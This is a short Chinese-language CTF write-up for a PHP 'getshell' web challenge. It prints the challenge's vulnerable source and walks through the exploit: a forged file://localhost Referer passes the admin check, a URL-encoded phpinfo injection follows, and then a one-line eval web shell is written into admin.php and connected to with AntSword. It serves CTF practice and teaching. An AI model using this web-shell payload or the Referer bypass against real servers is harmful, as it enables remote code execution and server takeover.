Web之getshell:
具体代码如下
<?php
highlight_file(__FILE__);
error_reporting(0);
echo "<h1>WELCOME 23333333333</h1>"."\n";
$url = $_SERVER["HTTP_REFERER"];
$r = parse_url($url);
if(!empty($r['host']) && $r['host'] === 'localhost' && $r['scheme'] === 'file'){
echo "yeah u are admin"."<br>";
}
else{
die('u are not admin'."<br>");
}
//only admin can do it
$content = addslashes($_GET['content']);
echo 'now_you_are_admin'."<br>";
if(!file_exists("admin.php")){
file_put_contents('admin.php', "secret = 'xxx'");
//change the content
if($content){
$file = file_get_contents("./admin.php");
$file = preg_replace("/secret = '.*'/", "secret = '{$content}'", $file);
file_put_contents('./admin.php', $file);
}
}
if (isset($_GET['reset'])){
@exec('/bin/rm -rf admin.php');
}
?>- 然后进行代码审计,发现需要进行file://伪协议,我们将referer改为file://localhost就可以将自己转成admin
- 进行下一步的代码审计,发现需要进行数据写入,并且写入之后的页面为php,于是采取?content=urldecode(%3C%3Fphp%20phpinfo()%3B%3F%3E)
- 于是采取写入一句话/?content=urldecode(<%3Fphp %40eval(%24_POST[123])%3F>),并使用蚁剑连接
最终在/目录下发现flag
标签:web,题目,admin,secret,content,ctf,file,php,contents From: https://www.cnblogs.com/wushiyiwuzhong/p/16607349.html